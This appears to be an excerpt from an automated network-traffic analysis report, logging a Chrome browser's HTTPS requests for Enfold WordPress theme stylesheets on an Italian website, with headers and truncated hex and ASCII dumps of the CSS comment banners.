                                                                                                                                              2025-01-03 16:32:50 UTC636OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:50 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:50 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2124
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:50 UTC2124INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 43 6f 75 6e 74 64 6f 77 6e 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Countdown===========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              16192.168.2.164973289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:50 UTC632OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:50 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:50 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2435
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:50 UTC2435INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 47 61 6c 6c 65 72 79 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Gallery=============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              17192.168.2.164973389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:50 UTC654OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:50 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:50 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 4006
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:50 UTC4006INData Raw: 0a 0a 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 48 6f 72 69 7a 6f 6e 74 61 6c 20 47 61 6c 6c 65 72 79 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Horizontal Gallery================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              18192.168.2.164973589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:50 UTC640OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/google_maps/google_maps.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:51 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:50 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2104
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:51 UTC2104INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0d 0a 47 4f 4f 47 4c 45 20 4d 41 50 53 0d 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================GOOGLE MAPS=======================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              19192.168.2.164973689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:51 UTC634OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/grid_row/grid_row.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:51 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:51 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1178
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:51 UTC1178INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0d 0a 4c 61 79 6f 75 74 20 47 72 69 64 20 2b 20 43 65 6c 6c 73 0d 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Layout Grid + Cells===============================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              20192.168.2.164973789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:51 UTC632OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/heading/heading.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:51 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:51 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3211
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:51 UTC3211INData Raw: 0a 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 48 45 41 44 49 4e 47 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================HEADING============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              21192.168.2.164974089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:51 UTC650OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:51 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:51 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1920
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:51 UTC1920INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 54 65 78 74 20 52 6f 74 61 74 6f 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Text Rotator========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              22192.168.2.164973989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:51 UTC622OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:51 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:51 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2265
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:51 UTC2265INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 48 52 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================HR==================================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              23192.168.2.164973889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:51 UTC626OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icon/icon.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:51 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:51 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 2479
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
